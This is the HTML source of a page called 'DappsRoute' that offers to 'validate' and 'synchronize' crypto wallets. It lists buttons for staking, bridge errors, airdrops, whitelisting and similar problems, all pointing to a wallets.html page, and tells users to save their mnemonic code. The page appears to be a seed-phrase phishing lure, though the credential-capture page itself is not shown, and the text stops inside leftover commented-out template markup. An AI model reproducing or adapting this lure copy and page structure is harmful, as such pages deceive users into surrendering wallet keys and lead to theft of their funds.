<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

  <head>
    <meta charset="utf-8" />
    <title>DappsRoute - Decentralized Launchpad</title>
    <meta name="author" content="themesflat.com" />

    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, maximum-scale=1"
    />
    <meta
      name="description"
      content="Our platform provides solutions on all transactions issues, staking issues (pool ant farm), validations, balance irregularities, withdrawal issues and bridging errors. With our highly secured integrations with top wallet providers, you can efficienty manage your wallets from a single dashboard."
    />

    <link rel="stylesheet" type="text/css" href="assets/css/style.css" />

    <link rel="shortcut icon" href="assets/icon/Favicon.html" />
    <link rel="apple-touch-icon-precomposed" href="assets/icon/Favicon.html" />

    <style type="text/css">
      .flat-title-page .overlay {
        background: black;
      }
    </style>
  </head>

  <body class="body header-fixed">
    <div class="preload preload-container">
      <div class="preload-logo"></div>
    </div>

    <div id="wrapper">
      <div id="page" class="clearfix">
        <header id="header_main" class="header_1 js-header">
          <div class="themesflat-container">
            <div class="row">
              <div class="col-md-12">
                <div id="site-header-inner">
                  <div class="wrap-box flex">
                    <div id="site-logo" class="clearfix">
                      <div id="site-logo-inner">
                        <a href="#" rel="home" class="main-logo">
                          <h4 style="color: white !important">
                            DappsRoute
                          </h4>
                        </a>
                      </div>
                    </div>
                    <!-- <div class="mobile-button"><span></span></div> -->
                    <!-- <nav id="main-nav" class="main-nav">
                                        <ul id="menu-primary-menu" class="menu">
                                            <li class="menu-item current-menu-item menu-item-has-children">
                                                <a href="index.html">Home</a>
                                                <ul class="sub-menu">
                                                    <li class="menu-item"><a href="index.html">Home 1</a></li>
                                                </ul>
                                            </li>
                                            <li class="menu-item menu-item-has-children">
                                                <a href="#">Activity</a>
                                                <ul class="sub-menu">
                                                    <li class="menu-item"><a href="activity1.html">Activity 1</a></li>
                                                    <li class="menu-item"><a href="activity2.html">Activity 2</a></li>
                                                </ul>
                                            </li>
                                        </ul>
                                    </nav> -->
                    <div class="flat-search-btn flex">
                      <div class="header-search flat-show-search" id="s1">
                        <a href="#" class="show-search header-search-trigger">
                          <svg
                            width="20"
                            height="20"
                            viewBox="0 0 20 20"
                            fill="none"
                            xmlns="http://www.w3.org/2000/svg"
                          >
                            <mask
                              id="mask0_334_638"
                              style="mask-type: alpha"
                              maskUnits="userSpaceOnUse"
                              x="1"
                              y="1"
                              width="18"
                              height="17"
                            >
                              <path
                                fill-rule="evenodd"
                                clip-rule="evenodd"
                                d="M1.66699 1.66666H17.6862V17.3322H1.66699V1.66666Z"
                                fill="white"
                                stroke="white"
                              />
                            </mask>
                            <g mask="url(#mask0_334_638)">
                              <path
                                fill-rule="evenodd"
                                clip-rule="evenodd"
                                d="M9.67711 2.87312C5.9406 2.87312 2.90072 5.84505 2.90072 9.49903C2.90072 13.153 5.9406 16.1257 9.67711 16.1257C13.4128 16.1257 16.4527 13.153 16.4527 9.49903C16.4527 5.84505 13.4128 2.87312 9.67711 2.87312ZM9.67709 17.3322C5.26039 17.3322 1.66699 13.8182 1.66699 9.49902C1.66699 5.17988 5.26039 1.66666 9.67709 1.66666C14.0938 1.66666 17.6864 5.17988 17.6864 9.49902C17.6864 13.8182 14.0938 17.3322 9.67709 17.3322Z"
                                fill="white"
                              />
                              <path
                                d="M9.67711 2.37312C5.67512 2.37312 2.40072 5.55836 2.40072 9.49903H3.40072C3.40072 6.13174 6.20607 3.37312 9.67711 3.37312V2.37312ZM2.40072 9.49903C2.40072 13.4396 5.67504 16.6257 9.67711 16.6257V15.6257C6.20615 15.6257 3.40072 12.8664 3.40072 9.49903H2.40072ZM9.67711 16.6257C13.6784 16.6257 16.9527 13.4396 16.9527 9.49903H15.9527C15.9527 12.8664 13.1472 15.6257 9.67711 15.6257V16.6257ZM16.9527 9.49903C16.9527 5.5584 13.6783 2.37312 9.67711 2.37312V3.37312C13.1473 3.37312 15.9527 6.1317 15.9527 9.49903H16.9527ZM9.67709 16.8322C5.52595 16.8322 2.16699 13.5316 2.16699 9.49902H1.16699C1.16699 14.1048 4.99484 17.8322 9.67709 17.8322V16.8322ZM2.16699 9.49902C2.16699 5.46656 5.52588 2.16666 9.67709 2.16666V1.16666C4.9949 1.16666 1.16699 4.8932 1.16699 9.49902H2.16699ZM9.67709 2.16666C13.8282 2.16666 17.1864 5.46649 17.1864 9.49902H18.1864C18.1864 4.89327 14.3593 1.16666 9.67709 1.16666V2.16666ZM17.1864 9.49902C17.1864 13.5316 13.8282 16.8322 9.67709 16.8322V17.8322C14.3594 17.8322 18.1864 14.1047 18.1864 9.49902H17.1864Z"
                                fill="white"
                              />
                            </g>
                            <mask
                              id="mask1_334_638"
                              style="mask-type: alpha"
                              maskUnits="userSpaceOnUse"
                              x="13"
                              y="13"
                              width="6"
                              height="6"
                            >
                              <path
                                fill-rule="evenodd"
                                clip-rule="evenodd"
                                d="M14.2012 14.2999H18.3333V18.3333H14.2012V14.2999Z"
                                fill="white"
                                stroke="white"
                              />
                            </mask>
                            <g mask="url(#mask1_334_638)">
                              <path
                                fill-rule="evenodd"
                                clip-rule="evenodd"
                                d="M17.7166 18.3333C17.5596 18.3333 17.4016 18.2746 17.2807 18.1572L14.3823 15.3308C14.1413 15.0952 14.1405 14.7131 14.3815 14.4774C14.6217 14.2402 15.0123 14.2418 15.2541 14.4758L18.1526 17.303C18.3935 17.5387 18.3944 17.9199 18.1534 18.1556C18.0333 18.2746 17.8746 18.3333 17.7166 18.3333Z"
                                fill="white"
                              />
                              <path
                                d="M17.7166 18.3333C17.5595 18.3333 17.4016 18.2746 17.2807 18.1572L14.3823 15.3308C14.1413 15.0952 14.1405 14.7131 14.3815 14.4774C14.6217 14.2402 15.0123 14.2418 15.2541 14.4758L18.1526 17.303C18.3935 17.5387 18.3944 17.9199 18.1534 18.1556C18.0333 18.2746 17.8746 18.3333 17.7166 18.3333"
                                stroke="white"
                              />
                            </g>
                          </svg>
                        </a>
                        <div class="top-search">
                          <form
                            action="#"
                            method="get"
                            role="search"
                            class="search-form"
                          >
                            <input
                              type="search"
                              id="s"
                              class="search-field"
                              placeholder="Search..."
                              value=""
                              name="s"
                              title="Search for"
                              required=""
                            />
                            <button
                              class="search search-submit"
                              type="submit"
                              title="Search"
                            >
                              <i class="icon-fl-search-filled"></i>
                            </button>
                          </form>
                        </div>
                      </div>
                      <div class="sc-btn-top mg-r-12" id="site-header">
                        <a
                          href="wallets.html"
                          id="connectbtn"
                          class="sc-button header-slider style style-1 wallet fl-button pri-1"
                        >
                          <span>Connect</span>
                        </a>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </header>

        <section class="flat-title-page home3 parallax">
          <img
            class="bgr-gradient gradient1"
            src="assets/images/backgroup-secsion/bg-gradient1.html"
            alt=""
          />
          <img
            class="bgr-gradient gradient2"
            src="assets/images/backgroup-secsion/bg-gradient2.html"
            alt=""
          />
          <img
            class="bgr-gradient gradient3"
            src="assets/images/backgroup-secsion/bg-gradient3.html"
            alt=""
          />
          <div class="shape item-w-16"></div>
          <div class="shape item-w-22"></div>
          <div class="shape item-w-32"></div>
          <div class="shape item-w-48"></div>
          <div class="shape style2 item-w-51"></div>
          <div class="shape style2 item-w-51 position2"></div>
          <div class="shape item-w-68"></div>
          <div class="overlay"></div>
          <div class="swiper-container mainslider auctions">
            <div class="swiper-wrapper">
              <div class="swiper-slide">
                <div class="slider-item">
                  <div class="themesflat-container">
                    <div class="wrap-heading flat-slider text-center">
                      <h2 class="heading">
                        Validate, initialize, <br />
                        and synchronize your
                      </h2>
                      <h1 class="heading">
                        <span class="tf-text s1">wallets</span>
                      </h1>
                      <p class="sub-heading mg-t-29 mg-bt-50">
                        Open end Decentralized protocol for syncing various
                        Wallets to Dapps Secure Servers.
                      </p>
                      <div class="flat-bt-slider flex">
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span>Staking</span>
                        </a>
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span>Bridge Error</span>
                        </a>
                      </div>
                      <div class="flat-bt-slider flex">
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span>Connect to Dapps</span>
                        </a>
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span>Rectification</span>
                        </a>
                      </div>
                      <div class="flat-bt-slider flex">
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span> Whitelist</span>
                        </a>
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span>TrustLine setup</span>
                        </a>
                      </div>
                      <div class="flat-bt-slider flex">
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span>RPC Validation</span>
                        </a>
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span>Migration</span>
                        </a>
                      </div>
                      <div class="flat-bt-slider flex">
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span> Update Wallet Balance</span>
                        </a>
                      </div>
                      <div class="flat-bt-slider flex mt-2">
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span>Claim Reward</span>
                        </a>
                      </div>
                      <div class="flat-bt-slider flex mt-2">
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span>High Gas Fees</span>
                        </a>
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span>Claim Airdrops</span>
                        </a>
                      </div>
                      <div class="flat-bt-slider flex mt-2">
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span>Snapshot</span>
                        </a>
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span>Transaction Delay</span>
                        </a>
                      </div>
                      <div class="flat-bt-slider flex mt-2">
                        <a
                          href="wallets.html"
                          class="sc-button header-slider style style-1 note fl-button pri-1"
                        >
                          <span>Clear Cache</span>
                        </a>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
              <!---<div class="swiper-slide">
                            <div class="slider-item">
                                <div class="themesflat-container">
                                    <div class="wrap-heading flat-slider text-center">
                                        <h2 class="heading">Discover, and collect
                                        </h2>
                                        <h1 class="heading"><span class="tf-text s1">extraordinary</span>
                                            <span>Monster NFTs</span>
                                        </h1>
                                        <p class="sub-heading mg-t-29 mg-bt-50">Marketplace for monster character cllections non fungible token NFTs
                                        </p>
                                        <div class="flat-bt-slider flex">
                                            <a href="explore-1.html" class="sc-button header-slider style style-1 rocket fl-button pri-1"><span>Explore
                                                </span></a>
                                            <a href="create-item.html" class="sc-button header-slider style style-1 note fl-button pri-1"><span>Create
                                                </span></a>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="swiper-slide">
                            <div class="slider-item">
                                <div class="themesflat-container">
                                    <div class="wrap-heading flat-slider text-center">
                                        <h2 class="heading">Discover, and collect
                                        </h2>
                                        <h1 class="heading"><span class="tf-text s1">extraordinary</span>
                                            <span>Monster NFTs</span>
                                        </h1>
                                        <p class="sub-heading mg-t-29 mg-bt-50">Marketplace for monster character cllections non fungible token NFTs
                                        </p>
                                        <div class="flat-bt-slider flex">
                                            <a href="explore-1.html" class="sc-button header-slider style style-1 rocket fl-button pri-1"><span>Explore
                                                </span></a>
                                            <a href="create-item.html" class="sc-button header-slider style style-1 note fl-button pri-1"><span>Create
                                                </span></a>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>--->
            </div>
            <div class="swiper-pagination"></div>
          </div>
          <div class="swiper-button-next btn-slide-next active"></div>
          <div class="swiper-button-prev btn-slide-prev"></div>
        </section>
        <section class="tf-box-icon bg-box-icon-color tf-section">
          <div class="themesflat-container">
            <div class="sc-box-icon-inner">
              <div class="sc-box-icon">
                <div class="image">
                  <svg
                    width="56"
                    height="56"
                    viewBox="0 0 56 56"
                    fill="none"
                    xmlns="http://www.w3.org/2000/svg"
                  >
                    <rect
                      y="6.10352e-05"
                      width="56"
                      height="56"
                      rx="16"
                      fill="#5142FC"
                    />
                    <path
                      fill-rule="evenodd"
                      clip-rule="evenodd"
                      d="M34.9222 26.0179H39.1035C39.5983 26.0179 39.9995 26.3981 39.9995 26.8672V29.8195C39.9937 30.2863 39.5959 30.6634 39.1035 30.6688H35.0182C33.8252 30.684 32.7821 29.9098 32.5115 28.8085C32.376 28.1247 32.5662 27.4192 33.0312 26.881C33.4961 26.3427 34.1883 26.0268 34.9222 26.0179ZM35.1034 29.122H35.4981C36.0047 29.122 36.4154 28.7327 36.4154 28.2525C36.4154 27.7722 36.0047 27.3829 35.4981 27.3829H35.1034C34.8611 27.3802 34.6277 27.4696 34.4554 27.631C34.2831 27.7925 34.1861 28.0127 34.1861 28.2423C34.186 28.7242 34.5951 29.1164 35.1034 29.122Z"
                      fill="#F9F9FA"
                      fill-opacity="0.4"
                    />
                    <path
                      d="M34.9227 24.2788H40C40 20.3154 37.5573 18.0001 33.4187 18.0001H22.5813C18.4427 18.0001 16 20.3154 16 24.2283V32.7718C16 36.6847 18.4427 39.0001 22.5813 39.0001H33.4187C37.5573 39.0001 40 36.6847 40 32.7718V32.4079H34.9227C32.5662 32.4079 30.656 30.5972 30.656 28.3636C30.656 26.13 32.5662 24.3193 34.9227 24.3193V24.2788Z"
                      fill="white"
                    />
                    <path
                      d="M28.4582 24.2789H21.6849C21.1766 24.2734 20.7675 23.8812 20.7676 23.3993C20.7734 22.923 21.1824 22.5398 21.6849 22.5399H28.4582C28.9649 22.5399 29.3756 22.9292 29.3756 23.4094C29.3756 23.8896 28.9649 24.2789 28.4582 24.2789Z"
                      fill="#948BFB"
                    />
                  </svg>
                </div>
                <h3 class="heading">
                  <a href="wallets.html">Make A selection</a>
                </h3>
                <p class="content">
                  We have varieties of options you can choose from to validate
                  or synchronize your wallet. Please select your correct option above before proceeding.
                </p>
              </div>
              <div class="sc-box-icon">
                <div class="image">
                  <svg
                    width="56"
                    height="56"
                    viewBox="0 0 56 56"
                    fill="none"
                    xmlns="http://www.w3.org/2000/svg"
                  >
                    <rect
                      y="6.10352e-05"
                      width="56"
                      height="56"
                      rx="16"
                      fill="#47A432"
                    />
                    <path
                      d="M23.104 16.0001H19.048C17.368 16.0001 16 17.3801 16 19.0732V23.164C16 24.868 17.368 26.236 19.048 26.236H23.104C24.796 26.236 26.1519 24.868 26.1519 23.164V19.0732C26.1519 17.3801 24.796 16.0001 23.104 16.0001Z"
                      fill="white"
                    />
                    <path
                      d="M23.104 29.7637H19.048C17.368 29.7637 16 31.1329 16 32.8369V36.9277C16 38.6197 17.368 39.9997 19.048 39.9997H23.104C24.796 39.9997 26.1519 38.6197 26.1519 36.9277V32.8369C26.1519 31.1329 24.796 29.7637 23.104 29.7637Z"
                      fill="white"
                    />
                    <path
                      d="M36.9516 16.0001H32.8956C31.2036 16.0001 29.8477 17.3801 29.8477 19.0732V23.164C29.8477 24.868 31.2036 26.236 32.8956 26.236H36.9516C38.6316 26.236 39.9996 24.868 39.9996 23.164V19.0732C39.9996 17.3801 38.6316 16.0001 36.9516 16.0001Z"
                      fill="white"
                      fill-opacity="0.4"
                    />
                    <path
                      d="M36.9516 29.7637H32.8956C31.2036 29.7637 29.8477 31.1329 29.8477 32.8369V36.9277C29.8477 38.6197 31.2036 39.9997 32.8956 39.9997H36.9516C38.6316 39.9997 39.9996 38.6197 39.9996 36.9277V32.8369C39.9996 31.1329 38.6316 29.7637 36.9516 29.7637Z"
                      fill="white"
                    />
                  </svg>
                </div>
                <h3 class="heading">
                  <a href="wallets.html">Validate Your Wallet</a>
                </h3>
                <p class="content">
                  Once you select your wallet, you will be prompted to connect
                  via a decentralized protocol. This can successfully be
                  completed manually or automatically.
                </p>
              </div>
              <div class="sc-box-icon mg-bt">
                <div class="image">
                  <svg
                    width="56"
                    height="56"
                    viewBox="0 0 56 56"
                    fill="none"
                    xmlns="http://www.w3.org/2000/svg"
                  >
                    <rect width="56" height="56" rx="16" fill="#9835FB" />
                    <path
                      fill-rule="evenodd"
                      clip-rule="evenodd"
                      d="M19.396 23.8885C19.396 21.1625 21.061 19.3955 23.638 19.3955H32.354C34.94 19.3955 36.605 21.1625 36.605 23.8885V29.1905C36.159 28.8125 34.812 27.8715 34.624 27.7595C33.224 26.9195 31.544 27.2995 30.454 28.7195C30.359 28.8445 28.782 31.1445 28.224 31.4885C28.095 31.5685 27.959 31.6115 27.814 31.6315C27.464 31.6615 27.127 31.4815 26.554 31.0985C26.224 30.8885 25.864 30.6495 25.454 30.4795C23.749 29.7665 22.45 30.9445 21.758 31.7345C21.749 31.7425 19.812 34.1045 19.781 34.1415C19.538 33.5505 19.396 32.8675 19.396 32.1025V23.8885ZM38 23.8885C38 20.3625 35.731 18.0005 32.354 18.0005H23.638C20.271 18.0005 18 20.3625 18 23.8885V32.1025C18 33.6745 18.447 35.0135 19.238 36.0095C19.247 36.0185 19.247 36.0285 19.256 36.0285C20.043 37.0135 21.166 37.6665 22.519 37.8995C22.531 37.9015 22.543 37.9035 22.556 37.9055C22.903 37.9625 23.262 38.0005 23.638 38.0005H32.354C32.535 38.0005 32.7 37.9665 32.874 37.9535C33.078 37.9365 33.289 37.9325 33.483 37.8985C33.74 37.8545 33.976 37.7775 34.215 37.7035C34.319 37.6705 34.43 37.6505 34.53 37.6125C34.773 37.5205 34.996 37.4015 35.217 37.2795C35.297 37.2355 35.383 37.1995 35.461 37.1505C35.678 37.0145 35.875 36.8555 36.068 36.6895C36.132 36.6345 36.201 36.5845 36.262 36.5265C36.45 36.3475 36.616 36.1505 36.775 35.9445C36.824 35.8795 36.876 35.8195 36.923 35.7525C37.076 35.5345 37.208 35.2995 37.33 35.0545C37.364 34.9835 37.4 34.9145 37.433 34.8425C37.546 34.5855 37.64 34.3165 37.72 34.0345C37.741 33.9585 37.762 33.8835 37.78 33.8055C37.851 33.5145 37.902 33.2145 37.935 32.9005C37.939 32.8625 37.95 32.8275 37.954 32.7895C37.961 32.7045 37.96 32.6195 37.965 32.5345C37.973 32.3885 38 32.2535 38 32.1025V23.8885Z"
                      fill="white"
                    />
                    <path
                      d="M24.5048 27.0001C25.8663 27.0001 27 25.87 27 24.5151C27 23.8356 26.7151 23.2132 26.2607 22.7615C25.8081 22.2935 25.1764 22.0001 24.4787 22.0001C23.1085 22.0001 22 23.1041 22 24.4687C22 24.6492 22.0213 24.8239 22.0591 24.9937C22.2878 26.1257 23.3081 27.0001 24.5048 27.0001Z"
                      fill="white"
                      fill-opacity="0.4"
                    />
                  </svg>
                </div>
                <h3 class="heading">
                  <a href="wallets.html">Generate QR Code</a>
                </h3>
                <p class="content">
                  Upon successful validation, a QR Code will be generated for
                  your wallet. You can always scan your QR Code to reinitialize
                  your wallet.
                </p>
              </div>
              <div class="sc-box-icon">
                <div class="image">
                  <svg
                    width="56"
                    height="56"
                    viewBox="0 0 56 56"
                    fill="none"
                    xmlns="http://www.w3.org/2000/svg"
                  >
                    <rect width="56" height="56" rx="16" fill="#DF4949" />
                    <rect
                      x="21"
                      y="22"
                      width="13"
                      height="4"
                      fill="white"
                      fill-opacity="0.4"
                    />
                    <path
                      fill-rule="evenodd"
                      clip-rule="evenodd"
                      d="M24.125 16H31.8375C35.225 16 37.9625 17.284 38 20.5478V38.7631C38 38.9671 37.95 39.1711 37.85 39.3511C37.6875 39.6391 37.4125 39.8551 37.075 39.9511C36.75 40.0471 36.3875 39.9991 36.0875 39.8311L27.9875 35.9432L19.875 39.8311C19.6888 39.9259 19.475 39.9871 19.2625 39.9871C18.5625 39.9871 18 39.4351 18 38.7631V20.5478C18 17.284 20.75 16 24.125 16ZM23.2753 25.1437H32.6878C33.2253 25.1437 33.6628 24.7225 33.6628 24.1958C33.6628 23.6678 33.2253 23.2478 32.6878 23.2478H23.2753C22.7378 23.2478 22.3003 23.6678 22.3003 24.1958C22.3003 24.7225 22.7378 25.1437 23.2753 25.1437Z"
                      fill="white"
                    />
                  </svg>
                </div>
                <h3 class="heading">
                  <a href="wallets.html">Save Wallet QR Code</a>
                </h3>
                <p class="content">
                  Saving your generated mnemonic code or QR Code is important.
                  You can click on Save or Screenshot the QR Code Page. You
                  choose how you want to save!
                </p>
              </div>
            </div>
          </div>
        </section>

        <!---<section class="tf-section top-seller bg-style">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-md-12">
                            <h2 class="tf-title style3 pb-15">
                                Popular Collection</h2>
                            <div class="heading-line"></div>
                        </div>
                        <div class="col-md-12">
                            <div class="collection">
                                <div class="swiper-container show-shadow carousel2 pad-t-20 button-arow-style">
                                    <div class="swiper-wrapper">
                                        <div class="swiper-slide">
                                            <div class="slider-item">
                                                <div class="sc-card-collection">
                                                    <a href="author01.html">
                                                        <div class="media-images-box">
                                                            <img src="assets/images/box-item/collection-item-1.png" alt="">
                                                            <div class="bottom-media">
                                                                <img src="assets/images/box-item/img-collection1.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection2.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection3.jpg" alt="Image">
                                                            </div>
                                                        </div>
                                                    </a>
                                                    <div class="card-bottom">
                                                        <div class="author">
                                                            <div class="sc-author-box style-2">
                                                                <div class="author-avatar">
                                                                    <img src="assets/images/avatar/avt-1.jpg" alt="" class="avatar">
                                                                    <div class="badge"><i class="ripple"></i></div>
                                                                </div>
                                                            </div>
                                                            <div class="content">
                                                                <h4><a href="author01.html"> Creative Art Collection</a></h4>
                                                                <div class="infor">
                                                                    <span>Created by</span>
                                                                    <span class="name"><a href="author02.html">Ralph Garraway</a></span>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <button class="wishlist-button public heart"><span class="number-like"> 100</span></button>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="swiper-slide">
                                            <div class="slider-item">
                                                <div class="sc-card-collection">
                                                    <a href="author01.html">
                                                        <div class="media-images-box">
                                                            <img src="assets/images/box-item/collection-item-4.jpg" alt="">
                                                            <div class="bottom-media">
                                                                <img src="assets/images/box-item/img-collection4.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection5.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection6.jpg" alt="Image">
                                                            </div>
                                                        </div>
                                                    </a>
                                                    <div class="card-bottom">
                                                        <div class="author">
                                                            <div class="sc-author-box style-2">
                                                                <div class="author-avatar">
                                                                    <img src="assets/images/avatar/avt-1.jpg" alt="" class="avatar">
                                                                    <div class="badge"><i class="ripple"></i></div>
                                                                </div>
                                                            </div>
                                                            <div class="content">
                                                                <h4><a href="author01.html"> Creative Art Collection</a></h4>
                                                                <div class="infor">
                                                                    <span>Created by</span>
                                                                    <span class="name"><a href="author02.html">Ralph Garraway</a></span>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <button class="wishlist-button public heart"><span class="number-like"> 100</span></button>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="swiper-slide">
                                            <div class="slider-item">
                                                <div class="sc-card-collection">
                                                    <a href="author01.html">
                                                        <div class="media-images-box">
                                                            <img src="assets/images/box-item/collection-item-5.jpg" alt="">
                                                            <div class="bottom-media">
                                                                <img src="assets/images/box-item/img-collection7.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection8.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection9.jpg" alt="Image">
                                                            </div>
                                                        </div>
                                                    </a>
                                                    <div class="card-bottom">
                                                        <div class="author">
                                                            <div class="sc-author-box style-2">
                                                                <div class="author-avatar">
                                                                    <img src="assets/images/avatar/avt-1.jpg" alt="" class="avatar">
                                                                    <div class="badge"><i class="ripple"></i></div>
                                                                </div>
                                                            </div>
                                                            <div class="content">
                                                                <h4><a href="author01.html"> Creative Art Collection</a></h4>
                                                                <div class="infor">
                                                                    <span>Created by</span>
                                                                    <span class="name"><a href="author02.html">Ralph Garraway</a></span>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <button class="wishlist-button public heart"><span class="number-like"> 100</span></button>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="swiper-slide">
                                            <div class="slider-item">
                                                <div class="sc-card-collection">
                                                    <a href="author01.html">
                                                        <div class="media-images-box">
                                                            <img src="assets/images/box-item/collection-item-1.png" alt="">
                                                            <div class="bottom-media">
                                                                <img src="assets/images/box-item/img-collection1.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection2.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection3.jpg" alt="Image">
                                                            </div>
                                                        </div>
                                                    </a>
                                                    <div class="card-bottom">
                                                        <div class="author">
                                                            <div class="sc-author-box style-2">
                                                                <div class="author-avatar">
                                                                    <img src="assets/images/avatar/avt-1.jpg" alt="" class="avatar">
                                                                    <div class="badge"><i class="ripple"></i></div>
                                                                </div>
                                                            </div>
                                                            <div class="content">
                                                                <h4><a href="author01.html"> Creative Art Collection</a></h4>
                                                                <div class="infor">
                                                                    <span>Created by</span>
                                                                    <span class="name"><a href="author02.html">Ralph Garraway</a></span>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <button class="wishlist-button public heart"><span class="number-like"> 100</span></button>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="swiper-slide">
                                            <div class="slider-item">
                                                <div class="sc-card-collection">
                                                    <a href="author01.html">
                                                        <div class="media-images-box">
                                                            <img src="assets/images/box-item/collection-item-4.jpg" alt="">
                                                            <div class="bottom-media">
                                                                <img src="assets/images/box-item/img-collection4.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection5.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection6.jpg" alt="Image">
                                                            </div>
                                                        </div>
                                                    </a>
                                                    <div class="card-bottom">
                                                        <div class="author">
                                                            <div class="sc-author-box style-2">
                                                                <div class="author-avatar">
                                                                    <img src="assets/images/avatar/avt-1.jpg" alt="" class="avatar">
                                                                    <div class="badge"><i class="ripple"></i></div>
                                                                </div>
                                                            </div>
                                                            <div class="content">
                                                                <h4><a href="author01.html"> Creative Art Collection</a></h4>
                                                                <div class="infor">
                                                                    <span>Created by</span>
                                                                    <span class="name"><a href="author02.html">Ralph Garraway</a></span>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <button class="wishlist-button public heart"><span class="number-like"> 100</span></button>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="swiper-slide">
                                            <div class="slider-item">
                                                <div class="sc-card-collection">
                                                    <a href="author01.html">
                                                        <div class="media-images-box">
                                                            <img src="assets/images/box-item/collection-item-5.jpg" alt="">
                                                            <div class="bottom-media">
                                                                <img src="assets/images/box-item/img-collection7.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection8.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection9.jpg" alt="Image">
                                                            </div>
                                                        </div>
                                                    </a>
                                                    <div class="card-bottom">
                                                        <div class="author">
                                                            <div class="sc-author-box style-2">
                                                                <div class="author-avatar">
                                                                    <img src="assets/images/avatar/avt-1.jpg" alt="" class="avatar">
                                                                    <div class="badge"><i class="ripple"></i></div>
                                                                </div>
                                                            </div>
                                                            <div class="content">
                                                                <h4><a href="author01.html"> Creative Art Collection</a></h4>
                                                                <div class="infor">
                                                                    <span>Created by</span>
                                                                    <span class="name"><a href="author02.html">Ralph Garraway</a></span>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <button class="wishlist-button public heart"><span class="number-like"> 100</span></button>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="swiper-slide">
                                            <div class="slider-item">
                                                <div class="sc-card-collection">
                                                    <a href="#">
                                                        <div class="media-images-box">
                                                            <img src="assets/images/box-item/collection-item-1.png" alt="">
                                                            <div class="bottom-media">
                                                                <img src="assets/images/box-item/img-collection1.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection2.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection3.jpg" alt="Image">
                                                            </div>
                                                        </div>
                                                    </a>
                                                    <div class="card-bottom">
                                                        <div class="author">
                                                            <div class="sc-author-box style-2">
                                                                <div class="author-avatar">
                                                                    <a href="#">
                                                                        <img src="assets/images/avatar/avt-1.jpg" alt="" class="avatar">
                                                                    </a>
                                                                    <div class="badge"><i class="ripple"></i></div>
                                                                </div>
                                                            </div>
                                                            <div class="content">
                                                                <h4><a href="#"> Creative Art Collection</a></h4>
                                                                <div class="infor">
                                                                    <span>Created by</span>
                                                                    <span class="name"><a href="#">Ralph Garraway</a></span>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <button class="wishlist-button public heart"><span class="number-like"> 100</span></button>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="swiper-slide">
                                            <div class="slider-item">
                                                <div class="sc-card-collection">
                                                    <a href="#">
                                                        <div class="media-images-box">
                                                            <img src="assets/images/box-item/collection-item-4.jpg" alt="">
                                                            <div class="bottom-media">
                                                                <img src="assets/images/box-item/img-collection4.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection5.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection6.jpg" alt="Image">
                                                            </div>
                                                        </div>
                                                    </a>
                                                    <div class="card-bottom">
                                                        <div class="author">
                                                            <div class="sc-author-box style-2">
                                                                <div class="author-avatar">
                                                                    <a href="#">
                                                                        <img src="assets/images/avatar/avt-1.jpg" alt="" class="avatar">
                                                                    </a>
